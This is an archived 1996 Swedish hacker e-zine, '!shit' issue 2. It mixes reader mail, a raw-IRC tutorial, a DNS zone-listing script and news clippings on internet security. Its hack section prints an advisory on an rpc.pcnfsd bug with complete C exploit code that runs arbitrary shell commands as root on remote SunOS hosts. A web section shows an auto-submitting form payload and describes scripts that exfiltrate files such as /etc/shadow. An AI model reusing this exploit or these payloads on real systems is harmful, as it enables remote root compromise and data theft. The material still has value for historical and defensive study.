Copy Link
Add to Bookmark
Report
No Shit Issue 02
#!/bin/more
____
/ \ ____ __ ____
\ /______/_ /_ ___/ /_
\ / _ / \ / _/
\/ __ \_/ __ / / /
Nummer #2 (hse/a) / \ \ \ /__/__/__/ Mars 1996
\__/_______/ desejerunte?
No idle, no gain
BRAINSTORM
Words, words, words 1.0
MAIL
Vi drar nÂgra lyckliga vinnare 2.0
frÂn mÂnadens postsck
IRC
IRC utan skyddsnt: Raw-IRC Dead Socket 3.0
HACK
Bug i pcnfsd lÂter dig exekvera Shellshock 4.0
kommandon som root
ntligen r den hr, DNScan 1.0 Shellshock 4.1
WWW
Kreativ Java-kodning htXs 5.0
NYTT 6.0
Etisk storstdning p internet 6.1
Epost som att skicka hemlighet med vykort 6.2
Oskert lÂta konsult skta Malmpolisens datahantering 6.3
Sex och politik bannlyst 6.4
Slutet fr de elektroniska klotterplanken 6.5
Netscapes kryptering bruten p nytt-med gammal metod 6.6
Storebror fumlar med lagbckerna 6.7
HD lt datakopierare behÂlla utrustning 6.8
Lucka i lagen skyddar piratkopior 6.9
SURF
r Mitnick en ¸berhacker eller en htXs 7.0
luser, avgr sjlv
MISC
Riksspolisstyrelsen p Internet Broken Pipe 8.0
En sysadmins samvete CB 8.1
-----------------------------------------------------------------------
Ord gÂr ut till besttningen p #hack.se fr hjlp med distributionen
-----------------------------------------------------------------------
(C)opyright?
/* -------------------------------------------------------------
All information i !shit publiceras endast i studiesyfte
och som underhÂllning.
Artikelfrfattarna i !shit r inga frebilder. De r inte ens
mnskliga. De r hackers. Vissa saker de gr kan f en
person skadad, relegerad, arresterad, mjligtvis utvisad.
Fr att uttrycka det hela p ett annat stt:
Don't try this at home.
------------------------------------------------------------- */
___ ___ __ __ __ _ __ ____ ___ ___ _ __
___ | _)| )/ | | \ |( _|_ _) _ \ ) V | _____________________________
1.0 |____)_)_\_|_|__|_\__|___)|__|\___/_)_\_v__|
Sedan den frra och frsta filen vi s grna kallar !shit trffade gatorna har
jag brjat dra mig fr att visa mig p irc. Jag kan frst att vÂra texter
fungerar som ett livselexir fr vissa, men ingen kan vara s beroende av detta
alster att det berttigar att frÂga mig *varje* dag nr nsta nummer kommer.
Artiklar kommer in lpande, och nya nummer kommer att slppas s fort det
finns tillrckligt med material fr att rttfrdiga det. Allts kommer varje
release sporadiskt, och jag varken vill eller kan veta nr det blir. SÂ,
det tjnar inget till att *tjata*. Ok?
Detta r inte ett angrepp p *alla* som frÂgat hur det gÂr med #2, tvrt om
r det givetvis trevligt att veta att det finns en efterfrÂgan p det vi gr.
Bara det finns mÂtta. Hoppas vi lyckats leva upp till frvntningarna.
Kanske inte som en blixt frÂn klar himmel har det uppstÂtt en hel del ideer
om hur !shit skall uttalas. Om dessa ideer faktiskt r missfrstÂnd lÂter
jag vara osagt eftersom det tvivellst inte finns en absolut sanning i denna
vetenskap. Men som en spark i rtt riktning fr den skara som inte alls kan
ta till sig betydelsen av utropstecknet i namnet, vill jag citera manfilen
fr bourne-shell: "! Unary negation operator". Nog om detta.
LÂt artiklarna och synpunkterna fortstta flda till: noshit@alpha.c2.org
__ __ __ __ _
___ | V |/ | | |_ _______________________________________________________
2.0 |__v__|_|_|__|___| frÂn /usr/lib/snedmail
Tyvrr kan vi av utrymmesskl inte ta med alla brev som vi fÂtt, men vi
uppskattar dem inte mindre fr det. Forstt skriva! Hr kommer nÂgra smakprov
som ganska bra representerar majoriteten av vÂr brevskrd.
Date: Thu, 04 Jan 96 19:14:00 +0200
From: Phoo
Subject: tack... snllt..
Tack s mkt fr att du gjort mig knd i ditt "fina" zine !SHIT...
mkt trevligt.. nu kommer jag frmodligen bli tvungen att byta nick..
fan ta dig.. :(
annars s dg !shit nstan... kommer det fler nummer eller?
vart kommer man f tag i skiten? lgg upp det p nÂn ftp...
|| -Phoo- of AiP
\__/
* SLMR 2.1a *
-------------------------
Date: Fri, 05 Jan 96 16:19:00 +0200
From: SPiFf
Subject: Lama..
Hohoooo... Jag lste just "din" tidning !shit, vilket faktiskt
sammanfattar den rtt bra... Shit.. Fukk, den suger kuk.. Kan du inte
gra en bttre tidning s gr ingen alls.. Du verkar tro att man r
ELiTe fr att man anvnder lite freakiga versaler/gemener.. Jag r fan
sker p att du inte ens r nÂn pirater .h.t. Du r bara en liten Lama
som sitter och skriver mesiga sm E-ZiNes...
Elite Commandments:
-------------------
1] Never admit you have no idea what
you're talking about.
(Den tar du bokstavligt)
2] Never have a good word to say about
anyone else but yourself.
(Wow.. Den fljer du ocksÂ)
3] Join every group that will let you
join. After a few weeks have passed,
quit & claim they aren't good enough
to merit your prescence.
(Hee.. Pook..)
4] Always shift the blame to someone
else. "It's not my fault" should
become 2nd nature to you.
(Humm....)
5] Always have nasty things to say
about your so called friends behind
their backs.
6] Hate as many people as possible.
(Du har vnt p den, "f s mÂnga som mjligt att hata dig")
7] Start as many rag wars as humanly
possible. When your up against
intelligent people (As on Adventurers
Tavern, 1982-1986. RIP), and losing
your end of the war. Say "This is
stupid and childish, even if I did
start it", and stop posting.
8] When someone becomes pushy and openly
challenges your lack of knowledge
about something. Say "I know the
answer, but you're not elite enough,
so I can't tell you".
(Haha.. rtt i prick)
9] If anyone still dares to question you
then threaten them with tough things
like getting someone to turn their
phones off, or charge 10 billion
toilets on their mothers credit card.
(It doesn't matter whether or not you
actually know how to do this, or know
anyone else who will do it for you.
This is a favorite tactic of ELITE!@
phreak groups like L0D!!@#1!.) If all
else fails began chanting "Cable
throw, Cable throw, Cable throw" or
if you are a pirate: make a fright-
ening rag page on them in your next
Copya crack.
[Warning: Be sure to only use this on a
fellow ELITE!@#1! phreak, pirate or
equivalent ignorant person. Anyone else
will laugh at you & tell you to fuck
off. Only adding to the questioning
of your massive eliteness.]
10] Make as big a fool of yourself as
is possible. Display your ignorance
and stupidity in a manner that will
make itself noticible to the modem
community at large. If you are a
aspiring elite pirate, get your
name on as many copya cracks as
fast as possible. Or if you are a
up and coming elite phreak, start
up your own little world (or join
someone else who has already done
this, such as LOD), refuse to see
anyones viewpoint but your own, &
declare yourselves mega-elite.
Fljer du bara dom hr reglerna eller? Fukk.. Och sen, nr du brjar ta
pHOo som exempel p en lama, s r du ganska lÂngt ute i skogen. Har du
inte hrt talas om pHOo s vet jag fan inte var du har varit de
nrmaste mÂnaderna.. Under en sten? =)
En sak till; p din lilla SuRf lista (Vem fan anvnder ordet surfa
ndÂ? LÂter som aftonbladet "S hr surfar du p ntet..") Duh..
Iaf, inte en enda FTP fanns med, alla kanske inte gillar att sitta och
se en massa fina bilder och menyer som p WWW, jag frstÂr att
W95-luserz som du kanske gillar det, men de flesta vill ha FTPs nr man
ska ladda hem prylar.. Ut och smurfa med dig...
Jaja, fortstt knapra p dina sm floppiez och skriv din ZiNe, men tro
inte att nÂn bryr sig... Iaf inte jag, the almighty SPiFf... =)
Fuck ELiTe, go ShareWare... NOT NOT NOT NOT NOT NOT!!!!!! =)
/EL SPiFf of AiP Rokxz da funkie Joint....
* SLMR 2.1a *
__ ___ ___
___ | | ) __) _____________________________________________________________
3.0 |__|_)_\___) Raw-IRC, av Dead Socket
Du har precis hackat ns.tip.net och knner att du behver beska #hack.se
fr att skryta med din ervring. Men det finns givetvis ingen irc-klient pÂ
ns.tip.net. Vad gr du nu?
Min rekommendation r att du kollar i Gula Sidorna under P fr psykolog. Inte
i helvete r du vl s dum att du anvnder ns.tip.net fr att irca? Kom igen!
Allvarligt talat, s r protokollet mellan klient och server baserat pÂ
kommandon som skickas i klartext, och det hela r mycket enkelt och raktfram.
Att hoppa ver klienten och ansluta sig direkt till servern kallas ibland fr
raw-irc. Det r inte svÂrare n en telnet till din favoritserver p port 6667
och att flja dessa enkla instruktioner.
beavis> telnet irc.nada.kth.se 6667
Trying 130.237.226.10...
Connected to mumrik.nada.kth.se.
Escape character is '^]'.
Det frsta som hnder nr du kopplar upp dig mot port 6667 r att irc-servern
frvntar sig viss information om dig. Brja med att skriva;
NICK IvilHaxor
...eller vilken nick du nu vill anvnda. Drefter mÂste du ange ditt konto,
host- och servername, samt ditt "riktiga" namn. Flten fr hostname och
servername ignoreras, s dr kan du skriva vad som helst. Syntaxen r:
USER ivilhax hostname servername :Da iViL 0nE
Om nicken inte r upptagen s kommer du att se ditt vlkomstmeddelande som
indikerar att du r inne. Nu kan du anvnda alla dina vanliga kommandon typ
JOIN, PART, MODE, osv.
JOIN #hack.se
:ivil!~ivil@enemy.public.se JOIN :#hack.se
:irc.nada.kth.se 353 ivil @ #hack.se :ivil @shshock @TheK @blur @Chaoz tcm @E-114 chaotic @acdhead @thk psyched
:irc.nada.kth.se 366 ivil #hack.se :End of /NAMES list.
Det som r annorlunda r hur du skriver till en channel eller skickar msg's.
BÂda delarna gr du med PRIVMSG enligt fljande:
PRIVMSG #hack.se :w0rdawp, wassup?
PRIVMSG shshock :n4r k0mm3r !shit #2, d00d?
Om du r inaktiv kommer du att f upp ett PING-meddelande. Typ:
PING :irc.nada.kth.se
Det mÂste du svara pÂ, annars kommer du att bli nedkopplad. Skriv:
PONG :irc.nada.kth.se
SvÂrare n s r det inte. Om du vill ha mer information om irc-protokollet
s finns det beskrivet i RFC1459.
_ __ __ ___ _ __
___ | L |/ | _| / / _______________________________________________________
4.0 |_||_|_|_|___|_|_\
Avalon Security Research
Release 1996.1
(pcnfsd)
Affected Program: rpc.pcnfsd
Tested Operating Systems: SunOS 4.1.X, Linux
Affect: Remote attackers may execute an arbitrary command as root on
the target machine.
Bug Synopsis:
rpc.pcnfsd's run_ps630 function does not correctly validate it's
arguments. This allows us to trick rpc.pcnfsd into running a command
other than ps630.
Fix:
The the run_ps630 function does not seem to be needed. Removing
the only call to it in pr_start (pcnfsd_print.c) should remove this
vulnerability.
Exploit Information:
Exploit code will be posted to the ASR mailing list exactly one week
from the release of this advisory.
Notes:
Although the rpc.pcnfsd bundled in all Linux distributions is
vulnerable. Is appears to be exceedingly difficult to exploit this
vulnerability under Linux. ASR welcomes and appreciates information
on the action of this vulnerability in other operating systems.
Sedan denna advisory slpptes har det gjorts fler tester, och buggen verkar
inte vara mjlig att utnyttja under Linux. Dock har vi kunnat bekrfta att
SunOS 4.x, Irix och BSDI r sÂrbara.
Ta hem sourcen till pcnfsd frÂn bcm.tmc.edu:/pcnfs/pcnfsd.93.02.16.tar.Z och
kompilera nedanstÂende program fr att testa om din pcnfsd r sÂrbar. Om du
har mjlighet att gra tester under nÂgot annat OS n ovan nmnda s r vi
mycket intresserade av resultatet. Skicka info till shshock@alpha.c2.org.
-----------------8<-- klipp hr -----------------------------------------------
/* slugger2.c
* By Josh D. November 1st 1995 AD
* rewritten January 31st 1996 AD
* compile w/ pcnfsd_clnt + pcnfsd_xdr + rpcsvc
* usage: slug2 target 'command'
* where:
* slug2 is this program.
* target is the target host
* 'command' is a bourne shell command within single quotes *and*
* with the slash chr ('/') substituted with the A environment
* variable: e.g. 'touch ${A}filename' would equate to
* 'touch /filename'.
* caveat:
* The command is limited to 27 charactars.
* Using shell meta-charactars (!#$^&*()<>[] etc etc) in your command
* will cause the exploit to fail.
* If rpc.pcnfsd was started from the rc scripts (as opposed to inetd)
* which it usually is: it will die after one succesful run of this
* program.
* The rpc calls this code makes always fail and print the error code:
* '137' <<---- See 'wierd ass error' below.
* This code always times out ont it's pr_start call because rpc.pcnfsd
* dies before it gets a chance to reply. This fix for this is
* to make to timeout value very small for the pr_start call.
*
* **********************************************************************
*
* This code is provided for educational purposes only.
* Neither Josh D. nor ASR take any responsibility for the use
* or misuse of this code.
*
*/
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <errno.h>
#include <arpa/inet.h>
#include <string.h>
#include <strings.h>
#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <netinet/in.h>
#include "pcnfsd.h" /* this should be created by rpcgen */
int main(argc, argv)
int argc;
char **argv;
{
char myhost[200];
int gids[8];
struct hostent *dahent;
struct sockaddr_in daserver;
CLIENT *datsme;
struct pr_init_args daargs;
struct pr_init_res *dares;
struct pr_start_args fags;
struct pr_start_res *figs;
char daprinter[65];
char dadir[65];
char dapath[255];
struct timeval tout;
int ranysock=RPC_ANYSOCK;
tout.tv_sec=60;
tout.tv_usec=0;
if (argv[3] != NULL && argv[4] != NULL)
{ printf("bad arguments\n");
exit(1);
}
if (strlen(argv[2]) > 27)
{ printf("command must be less than 27 chars\n");
exit(1);
}
/* this must be a valid printer */
strcpy(daprinter, "lp");
daserver.sin_family = AF_INET;
daserver.sin_port = 0;
dahent = gethostbyname(argv[1]);
if (dahent == NULL)
{ printf("gethost failed.\n");
exit(1);
}
bcopy(dahent->h_addr, &daserver.sin_addr.s_addr, 4);
datsme = clntudp_create(&daserver, 150001, 1,
tout, &ranysock);
clnt_control(datsme, CLSET_TIMEOUT, &tout);
gids[0]=0;
gids[1]=1;
datsme->cl_auth = authunix_create(myhost, 0, 0, 2, gids);
sprintf(dapath, "..${A:=$HOME}..$A..${A}bin${A}sh -c \"%s\" ", argv[2]);
daargs.pia_client = dapath;
daargs.pia_printername = daprinter;
/* Wierd ass error:
whenever we pub '"' in a string for pr_init/pr_start rpcsvc
seems to break.
This doesn't imapir the effects of the exploit, it simply
doesn't allow us to see any errors pcnfsd returns. I don't
plan on fixing this. */
/* simple minds.... */
if ( (dares = pcnfsd_pr_init_1(&daargs, datsme)) == NULL)
{ printf("137\n"); }
else
{ if (dares->pir_stat == PI_RES_OK)
printf("Success\n");
if (dares->pir_stat != PI_RES_OK)
{ printf("Error: ");
switch(dares->pir_stat)
{
case PI_RES_NO_SUCH_PRINTER :
printf("No such printer\n");
break;
case PI_RES_OK :
printf("Result Ok\?\?\n");
break;
case PI_RES_FAIL :
printf("Generic Failure\n");
break;
default :
printf("Unknown Error\n");
}
}
}
fags.psa_client = ".";
fags.psa_printername = daprinter;
fags.psa_username = "root";
fags.psa_filename = dapath;
fags.psa_options = (argv[3] == NULL) ? "d ;> " : "d ;< ";
/* simple pleasures */
figs = pcnfsd_pr_start_1(&fags, datsme);
if (figs == NULL)
{ printf("137\n");
exit(1);
}
}
-----------------8<-- klipp hr -----------------------------------------------
4.1
Universalverktyget fr domnfrÂgor
DNScan
Fr ett tag sedan s ville jag lista alla burkar med DNS-entries fr ett helt
land, och insÂg att det inte lt sig gras enkelt. SÂ jag hackade ihop en
liten utility fr det, och gav den till nÂgra kompisar p #hack.se och bad
att de inte skulle sprida den vidare tills det att jag hade en frdig och
bugtestad version klar.
Mindre n en vecka senare brjade jag f mail frÂn stllen s lÂngt bort som
Malaysia som tackade fr att jag skrivit ett sÂdant anvndbart verktyg.
Hmm...
Tyngd av ansvaret att folk faktiskt anvnder mitt lilla script har jag nu
fixat de buggar som fanns och fÂtt fram en version 1.0 som jag vÂgar st fr.
HÂll till godo.
-----------------8<-- klipp hr -----------------------------------------------
#!/bin/sh
#
# DNScan 1.0 by Shellshock (shshock@alpha.c2.org)
#
# Directory for temporary files
TMPDIR=.
# Name of lockfile for -file mode
LOCKFILE=$TMPDIR/dnscan.lock
# Set default parameters to nslookup, 2 retries with a timeout of 10 secs
PARAMS="-retry=2 -timeout=10"
# Print usage information
usage()
{
more << end-of-text
Usage: dnscan [-quiet] [-file <filename>] [-domain <domain>] [-sub <subdomain>]
-quiet Useful when piping to a file while running in the background.
-file Use <filename> as a list of subdomains and servers to scan.
-domain List all servers in a first level domain like .uk or .no.
-subdomain List all servers in a subdomain.
DNScan usually generates alot of output, so you probably want to pipe the
output to a file. Some messages will still be sent to you terminal to keep
you informed of whats going on, unless you use -quiet.
The -domain mode will first create a file called 'domain.<domain>' with a
list of all subdomains and their name servers, and then use that file in
the -file mode. It will not work with the com, edu, mil, gov, net or org
domains, because there is no single name server that will list these.
If you want to create your own file to run in the -file mode, each line of the
input file needs to have the following format:
<domain> <subdomain> [<dns>]
* To list all servers in Japan, do "dnscan -domain jp".
* To list all servers in the netcom domain, do "dnscan -sub netcom.com".
* To find Sun boxes at swipnet, do "dnscan -sub swip.net | grep -i sun".
I've found that sometimes nslookup hangs on a query. Just find nslookup with
ps and kill it, and the scan will continue with the next subdomain.
end-of-text
}
### Strip away all unwanted lines from the output of the 'ls -d', that is:
### - all server names ending with a dot, they are probably in another domain
### - all references to localhost (127.0.0.1)
### - all lines not of the type A or HINFO
clean_serverlist()
{
sed -n " {
/^.*\. /d
/127.0.0.1$/d
/ A /s/^ /$SUBDOMAIN /p
/ HINFO /s/^ /$SUBDOMAIN /p
} " | sort -u
}
### List the name servers handling the selected subdomain
list_subdomain_dns()
{
echo "$SUBDOMAIN" | nslookup -querytype=ns $PARAMS |\
sed -n 's/.*nameserver = //p'
}
### Print a formated list of servers (recordtypes A and HINFO) in a subdomain
### If we don't already have selected a name server, take the first in the
### list from list_subdomain_dns, or even better use one that is actually
### within the subdomain
list_subdomain()
{
if [ -z "$DNS" ]; then
DNS=`list_subdomain_dns | grep -i $SUBDOMAIN\$ | sed -n 1p`
[ $DNS ] || DNS=`list_subdomain_dns | sed -n 1p`
[ $QUIET ] || echo "Using name server $DNS for *.$SUBDOMAIN" >&2
fi
echo "ls -d $SUBDOMAIN" | nslookup $PARAMS - $DNS | clean_serverlist
}
### Scan all subdomains listed in a file
from_file()
{
while read domain subdomain DNS; do
[ $domain ] || continue
SUBDOMAIN=$subdomain.$domain
# If POS is set, we are continuing an interrupted scan
if [ $POS ]; then
[ $SUBDOMAIN != $POS ] && continue
unset POS
fi
[ $QUIET ] || echo "Scanning $SUBDOMAIN" >&2
# Write infile and subdomain to a lockfile, so that we
# later can continue the scan if we get interrupted
echo "$INFILE $SUBDOMAIN" > $LOCKFILE
list_subdomain
echo
done < $INFILE
}
### Strip away all but the NS lines from the output of the 'ls -d' and sort
### Also filter server names ending with a dot, and prepend the domain name
### first on each line
clean_dnslist()
{
sed -n " {
/^.*\. /d
s/^ /$DOMAIN /
s/ NS / /p
} " | sort -u +1 -2
}
### List all the name servers handling the selected domain
list_domain_dns()
{
( echo root; echo "$DOMAIN." ) |\
nslookup $PARAMS -querytype=ns -domain=$DOMAIN |\
sed -n 's/.*nameserver = //p'
}
### List all name servers in the selected domain
list_domain()
{
DOMAINFILE=domain.$DOMAIN
# Use first name server in the list for the domain
domain_dns=`list_domain_dns | sed -n 1p`
[ $QUIET ] || echo "Using name server $domain_dns for *.$DOMAIN" >&2
# Create a file with all subdomains and their name servers, and then
# switch to -file mode
echo "ls -d $DOMAIN" | nslookup $PARAMS - $domain_dns |\
clean_dnslist > $DOMAINFILE
MODE=file
INFILE=$DOMAINFILE
from_file
}
### Parse flags
unset QUIET
while [ -n "$1" ]; do
case "$1" in
-quiet) QUIET=true
;;
-file) MODE=file
INFILE=$2
shift
;;
-domain) MODE=domain
DOMAIN=`echo $2 | sed 's/^\.//'`
shift
;;
-sub) MODE=subdomain
SUBDOMAIN=`echo $2 | sed 's/^\.//'`
shift
;;
*) usage
exit
;;
esac
shift
done
### Look for previously interrupted scan
if [ -f $LOCKFILE ]; then
echo "Continue previously interrupted scan [n]? \c" >&2
read r
if [ `echo x$r | grep -i "^xy"` ]; then
read INFILE POS < $LOCKFILE
[ $POS ] && MODE=file
fi
[ $QUIET ] || echo >&2
fi
### Present ourself
[ $QUIET ] || ( echo "DNScan 1.0 by Shellshock"; echo ) >&2
### Select mode
case $MODE in
file) from_file
;;
domain) list_domain
;;
subdomain) list_subdomain
;;
*) usage
exit
;;
esac
### Clean up the temporary file we have created
rm $LOCKFILE 2>/dev/null
__ __ __ __
___ \ \/\/ /\/\/ /\/\/ / _____________________________________________________
5.0 \_/\_/\_/\_/\_/\_/ Kreativ Java-kodning, av htXs
Debatten om vad nÂgon med ont uppsÂt kan stlla till med, med hjlp av Java
r i full gÂng. Redan finns det ett par ganska skrmmande (eller upplyftande,
beroende p vem man r) frslag:
Ta fljande lilla script till exempel.
<body onload="document.mailme.submit()">
<form method=post name=mailme
action="mailto:noshit@alpha.c2.org?subject=n4r k0mmer numm3r 2?">
<input type=hidden name="noshit" value="bullshit">
</form>
<img src=/pics/bigones.gif>
</body>
Nr du tror att du endast tittar p en helt oskyldig sida med en GIF-bild pÂ,
s skickas i sjlva verket ett mail till noshit@alpha.c2.org, i *ditt* namn,
i gonblicket som du ppnar sidan.
http://www.popco.com/grabtest.html
Eller vad sgs om ett script som gmmer sig i bakgrunden, och varje gÂng du
gÂr till en ny URL s rapporteras det tillbaka till servern dr du "plockade
upp" det elaka scriptet?
http://www.osf.org/~loverso/javascript/track-me.html
Det tredje och kanske vrsta exemplet r ett script som listar ett bibliotek
eller en fil p din hÂrddisk, och skickar ivg resultatet. Om du skulle
starta Netscape som root innebr att din /etc/shadow helt pltsligt kan
plockas frÂn din dator, utan att du mrker det!
http://www.osf.org/~loverso/javascript/dir.html
Brendan Eich frÂn Netscape lovade (inofficiellt) fljande 29/2 fr att
lsa ovanstÂende skerhetsproblemen med Java:
"We're fixing directory listing and mail spamming, plus adding a Preference
to disable JavaScript, in a special 2.01 release that's about to supercede
2.0. Also in the Gold release, and (of course) in the "next release"
(3.0b1, I believe)."
Hmm...
__ _ _ _ ____ __
___ | \ | ) |_ _) ) _______________________________________________________
6.0 |_\__|_ |__|__| Nyhetsklipp frÂn januari och februari
(___/
---------------------------------------------------------------------------
6.1 Dagens Industri, 951230 Etisk storstdning p internet
---------------------------------------------------------------------------
Det finns mycket skrp p det internationella datantet
internet. Lika illa r det med de speciella databaser som gÂr
under beteckningen BBS, elektroniska anslagstavlor. Information
som snarast r desinformation presenteras som om de vore nyttiga
nyheter. Men nu r det dags fr etiska spelregler.
Det ska bli slut p den elektroniska miljfroreningen - de
svenska IT-fretagens branschorganisation Sito gÂr till attack
och uppmanar sina medlemmar att stoppa oetisk information. Jag
tror att branschen kan sanera sig sjlv, sger Hans Iwan Bratt,
VD fr Sito i Stockholm.
Med vÂra nya regler om ansvar fr elektronisk information skapar
vi nÂgot som nrmast liknar de pressetiska reglerna. Det vore
olyckligt med stelbent lagstiftning, en lagstiftning som ndÂ
inte skulle ge effekt.
Hotas med uteslutning
Sitos medlemsfretag blir skyldiga att flja de stundande etiska
affrsreglerna fr elektronisk information. Den som bryter mot
dem utesluts ur branschorganisationen.
Hans Iwan Bratt anser att de stora problemen med skrpinformation
handlar om dÂlig och frÂldrad information. Det frekommer ocksÂ
obehagliga frfljelser mot privatpersoner och folkgrupper pÂ
sÂvl internet som p vissa BBS-adresser. Dremot tycker Hans
Iwan Bratt att spridningen av barnpornografi fÂtt allt fr stor
publicitet: Det r ett ytterst litet problem med f aktrer och fÂ
intresserade. Personfrfljelser och sabotage av olika slag r
betydligt allvarligare fr internets rykte.
Ett vanligt sabotage r s kallad bombning: en misshaglig person
eller aktr p internet fÂr s mycket elektronisk post att
dennes elektroniska brevlÂda kollapsar. Resultatet blir ofta att
personen eller operatren fÂr stnga sin anslutning till
internet. I USA har t ex militanta kvinnogrupper bombat
internetsidor som visar porr- och fotomodeller.
Risk fr peststmpel
Enligt Hans Iwan Bratt lper internet stor risk att f samma
peststmpel som 071-numren fick fr nÂgra Âr sedan. Det hotar
den kommande kommersiella utvecklingen av internet och drfr
reagerar branschen.
Svag organisation
Sito hette tidigare LKD och samlar 250 medlemsfretag med en
total omsttning p 100 miljarder kronor - 90 procent av
branschens totalomsttning. nd anses Sito vara en relativt
svag branschorganisation; flertalet IT-fretag r smÂfretag som
inte r med men som nd agerar p internet eller BBS. Det r
dessutom i praktiken omjligt att frbjuda information pÂ
internet utan att kapa frbindelserna med omvrlden. Frbjuds
tex starklsreklam p internet i Sverige s kan informations-
lmnaren flytta till utlandet med nÂgra enkla handgrepp vid
datorn.
---------------------------------------------------------------------------
6.2 TT, 960123 Epost som att skicka hemlighet med vykort
---------------------------------------------------------------------------
Dataskerheten p svenska fretag och myndigheter r ofta
skrmmande dÂlig.
Sekretessbelagda uppgifter om privatpersoner, till exempel
sjukjournaler, straffregister och annat gÂr i klarskrift ver
internet. Hemlig fretagsinformation snds utan skydd.
-Det r som att skicka hemligheter med vykort, sger
dataexperten Tommy Pedersen.
Han har jobbat med dataskerhet i sex Âr och brjar bli ganska
luttrad. Skerhetsbristerna r ofta hpnadsvckande. PÂ tisdagen
pratade han skerhet p ett seminarium vid en fackmssa fr tele-
kommunikationer p Svenska Mssan i Gteborg.
Dr, p Telecom Scandinavia, var det de tekniska nymodigheterna
och alla spnnande mjligheter de ger, som var huvudtemat. I
Tommy Pedersens vrld finns ven den mrka sidan av utvecklingen,
den som kan anvndas fr industrispionage och som kan hota
mnniskors personliga integritet. Fr den som vill leta r det
inga problem att till exempel sortera i epost-hgarna pÂ
internet.
Bara att ta fram
Speciella program hjlper snokaren att leta och tar bara fram
det han eller hon r intresserad av.
-Det r fritt fram fr den som vill spionera, sger Pedersen.
Han arbetar fr ett fretag som heter Sectra AB i Linkping och
som levererar krypteringsutrustning fr datakommunikation till
svenska frsvaret. Dr finns medvetenheten. PÂ privata marknaden
och bland myndigheterna r vakenheten smre.
-Datainspektionen borde f strre resurser, framfr allt nr
det gller tekniker, sger Tommy Pedersen. Han har sett strikt
privata, sekretessbelagda personuppgifter g helt ppet p ntet.
Fretag, som lgger stora summor p elektroniska vervaknings-
system, vaktutbildning och svÂrforcerade stngsel, skickar just
den fretagsinformation man vill skydda utan minsta sekretess.
Som vykort, enligt Pedersen.
-Hade de legat i kuvert s hade man Âtminstone haft det lilla
skyddet fr hemligheterna.
Bristerna finns p alla nivÂer, ven hos stora svenska
multinationella fretag. SÂdana som borde veta bttre.
Inte dyrt att skydda
Tekniken fr att kryptera och skydda informationen har funnits
lnge och r heller, enligt Pedersen, inte speciellt dyr.
Problemet r snarare att f beslutsfattarna att frstÂ.
-Skerhetscheferna p fretagen har ofta sin bakgrund i vad man
kan kalla fysisk skerhet. Kommunikationerna r teknikernas sak,
sger Pedersen.
I Sverige finns det en handfull fretag som sysslar med
skerhetsfrÂgor. I utlandet, till exempel Italien och England,
r branschen betydligt mer utbyggd. Antalet databrott har
tvingat fram medvetenheten.
---------------------------------------------------------------------------
6.3 TT, 960124 Oskert lÂta konsult skta Malmpolisens datahantering
---------------------------------------------------------------------------
Rikspolisstyrelsen (RPS) har frbjudit lnspolismstaren i Malm,
Hans Wranghult, att lÂta en utomstÂende konsult ta hand om
myndighetens hela datahantering.
-En kovndning och dessutom inkonsekvent eftersom RPS ocksÂ
anvnder konsulter, menar en besviken Wranghult.
Det handlar inte om kostnaden. I stllet hnvisar RPS till
skerhetsaspekten i beslutet att stoppa Malmpolisens
konsultplaner.
Det som Malmpolisen planerat kallas i datakretsar fr
"outsourcing". Det innebr att hela dataverksamheten,
hanteringen av allt frÂn spaningsuppgifter till bokfring,
skulle lggas ut p ett konsultfretag. Att gra det r enligt
RPS en mycket knslig frÂga, och strax fre Ârsskiftet frbjd
man uttryckligen Malmpolisen att fullflja planerna, berttar
Sveriges Televisions Sydnytt. Hans Wranghult, som bland annat
utrett databrott och r RPS databrottsexpert, frvÂnas ver
beslutet:
-Jag har planerat detta sedan hsten 1994 och naturligtvis
gjort skerhetsbedmningar.
-I ver ett Âr har RPS dessutom haft full insyn och fÂtt
information om projektets fortskridande. Senast i september var
en representant frÂn RPS p besk hr, sger Wranghult till TT.
Under hela processen fram tills helt nyligen har lnspolis-
mstaren varit vertygad om att konsultprojektet drfr varit
frankrat och uppskattat hos RPS.
Stategisk betydelse
Det var RPS dataexpert Bjrn Lindqvist som beskte Malm i
hstas. Hans bild r nÂgot annorlunda n Wranghults.
-Jag kan bara beklaga om Hans Wranghult fick intrycket att vi
var positiva till outsourcing. I sjlva verket franleddes mitt
besk av att vi d helt nyligen insett omfattningen av Malms
planer.
-Efter mitt Malmbesk gjorde jag omedelbart en muntlig rapport
till rikspolisstyrelsens direktion.
-Wranghult borde ha insett att detta var en frÂga av strategisk
betydelse, ett beslut som ytterst mÂste hamna hos rikspolischefen.
Lindqvist pÂpekar ocks att lnspolisorganisationerna i
Stockholm och Gteborg klarar av att i huvudsak sjlva hÂlla i
sin datahantering.
-Det kan frekomma vissa konsultinsatser. Men total outsourcing,
som Malm planerade, finns inte nÂgonstans inom polisen, sger
han.
RPS uttryckliga frbud mot att anvnda ett utomstÂende fretag
fr drift, underhÂll, och fortbildning inom datahanteringen,
tvingade Malmpolisen att bryta samarbetet med det databolag
som d redan arbetat med en totalinventering av myndighetens
datahantering.
900 000 kronor r hittills nedpljda i projektet.
-Men det r inte pengar som kastats i sjn. Den strsta
kostnaden ligger just p inventering och dokumentation, menar
Wranghult.
Efter kallduschen med RPS frbud har lnspolismyndigheten i
Malm ocks hunnit g vidare i arbetet med att bygga upp den
egna kompetensen p omrÂdet. Den gÂngna helgen annonserade man
exempelvis efter en datachef.
---------------------------------------------------------------------------
6.4 Svenska Dagbladet, 960206 Sex och politik bannlyst
---------------------------------------------------------------------------
Den allmnna ordningen mÂste upprtthÂllas. Det innebr att
kineserna fÂr klara sig utan politik och sex p Internet. Den
kinesiska regeringen brjar bli orolig fr att cyberrymden ska
frvrida huvudena p alla ntsurfare. Ministeriet fr Post och
Tele ska se till att alla Internetanvndare registreras och att
alla kontakter med internationella datant gÂr via ministeriet,
enligt tidningen Financial Times.
Allt fr att komma ifrÂn "ohlsosamma tendenser" i samhllet.
Exempel p sÂdana tendenser r individer som sysslar med
statshemligheter och pornografiskt material - s kallad
barbarisk information.
Icke nskvrt
Hur ska d Kina f stopp p informationen som fldar p Internet.
Jo, genom att skapa en "Internet Light" dr anvndarna har
obegrnsad tillgÂng tillvarandras material men avskrmas frÂn det
som inte r "nskvrt" frÂn omvrlden. Kina gÂr med i det nya
informationssamhllet, men begrnsar samtidigt tillgngligheten,
skriver tidningen Wall Street Journal. n s lnge anvnder bara
